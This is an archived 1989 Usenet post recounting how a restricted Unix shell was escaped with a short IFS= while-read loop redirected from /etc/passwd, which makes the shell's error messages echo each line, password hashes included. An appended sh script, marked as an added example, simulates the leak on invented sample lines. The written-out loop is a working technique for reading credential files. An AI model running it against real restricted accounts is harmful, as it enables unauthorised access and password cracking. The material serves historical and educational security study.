Restricted shell isn't! (was: Restricted shell)

Randal L. Schwartz @ Stonehenge merlyn at intelob.biin.com
Sun Jan 1 11:09:38 AEST 1989


In article <366 at siswat.UUCP>, buck at siswat (A. Lester Buck) writes:
| [stuff about setting PATH in an 'sh -r'...]
|			     Even this setup is described as "not
| really very secure."  We can all imagine some interesting attacks.
| Just nothing as trivial as "$ sh".

I think it was research!bwk (Kernighan) that posted an article about
four years ago that detailed the following scenario:

He and a cohort were provided a login on another Bell Labs UNIX box
(running V7, or something non-BSD-like) with the following
restrictions:

(1) Login shell = /bin/rsh
(2) PATH= (that is, nothing in the PATH)
(3) non-writable, empty (but existent) $HOME directory
(4) No other hints

They said that they broke root in under an hour.  Here was their
method of attack:

(1) login
(2) enter:
	IFS=
	while read a
	do $a
	done </etc/passwd
(3) shell responds with:
root:asdfasdf123:0:0:The Root:/:/bin/sh: restricted
nextuser:12341234asd:1:1:A Luser:/usr/nextuser:/bin/csh: restricted
...

In other words, out comes the /etc/passwd file.  Now, apply standard
break-in techniques. :-) Essentially, you could read any public file
on the system with this built-in cat(1).

So, the summary was something like "something as powerful as the
language of the shell cannot be restricted sufficiently to warrant its
use in a limited environment and still be useful."  (A very bad
paraphrase... someone wanna dredge that article up if they have it? :-)
-- 
Randal L. Schwartz, Stonehenge Consulting Services (503)777-0095
on contract to BiiN Technical Information Services (for now :-),
in a former Intel building in Hillsboro, Oregon, USA.
<merlyn at intelob.biin.com> or ...!tektronix!inteloa[!intelob]!merlyn
SOME MAILERS REQUIRE <merlyn at intelob.intel.com> GRRRRR!
Standard disclaimer: I *am* my employer!
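As an added example, not part of Schwartz's post or of the Kernighan article he recalls: a POSIX sh script that models the "built-in cat" on a constructed passwd-like file with a simulated restricted shell, so the mechanism can be studied offline without a real rsh and without touching the real /etc/passwd. It shows why the `IFS=` line in the post matters (with the default IFS, `$a` is word-split and the line is truncated at the first blank, which here falls inside the GECOS field) and that the information channel is the diagnostic quoting the rejected command word. The function names, the sample lines and the two diagnostic formats are assumptions made for this example.

```shell
#!/bin/sh
# Added example, not from the original post: models the "built-in cat" on
# a constructed file with a simulated restricted shell, so the mechanism
# can be studied offline. Function names and the diagnostic formats are
# assumptions made for this example; nothing here reads the real /etc/passwd.

# Constructed sample lines in passwd layout (values invented for the example).
make_sample_passwd() {
    printf '%s\n' \
        'root:asdfasdf123:0:0:The Root:/:/bin/sh' \
        'nextuser:12341234asd:1:1:A Luser:/usr/nextuser:/bin/csh'
}

# Simulated restricted shell, modelled on the post: every command is refused,
# and the diagnostic quotes the rejected command word. That quoting is the
# information channel: whatever the loop feeds in comes straight back out.
restricted_exec() {
    printf '%s: restricted\n' "$1"
}

# Hypothetical variant whose diagnostic does not repeat the command word.
# Used only to show where this particular leak sits; it is not a fix for
# the design, which is the point of the post.
restricted_exec_silent() {
    printf 'restricted: command not permitted\n'
}

# The loop from the post, fed on stdin, run in a subshell so the IFS change
# stays local. $1 selects the IFS handling, $2 names the simulated shell.
#   nosplit : IFS=          -> $a expands as one word, the whole line leaks
#   split   : default IFS   -> $a is word-split, so the line is truncated
#                              at the first blank (here inside "The Root")
leak_lines() (
    mode=$1
    executor=${2:-restricted_exec}
    if [ "$mode" = nosplit ]; then
        IFS=
    else
        unset IFS
    fi
    while read -r a
    do "$executor" $a
    done
)

# Demonstration: the three cases side by side.
demo() {
    echo '# IFS= (as in the post): whole lines come back'
    make_sample_passwd | leak_lines nosplit
    echo '# default IFS: word splitting truncates at the first blank'
    make_sample_passwd | leak_lines split
    echo '# diagnostic that omits the command word: no content returned'
    make_sample_passwd | leak_lines nosplit restricted_exec_silent
}

demo
```

Run it as `sh leak_demo.sh` (any name). The first block of output reproduces the post's result line for line; the second shows that without `IFS=` the hash field still comes back but everything after the first space is lost; the third shows that the content returns only because the diagnostic echoes the rejected word. Closing that one channel does not rescue a restricted shell, since the loop, the redirection and the variable expansion are all still available to whoever types at it.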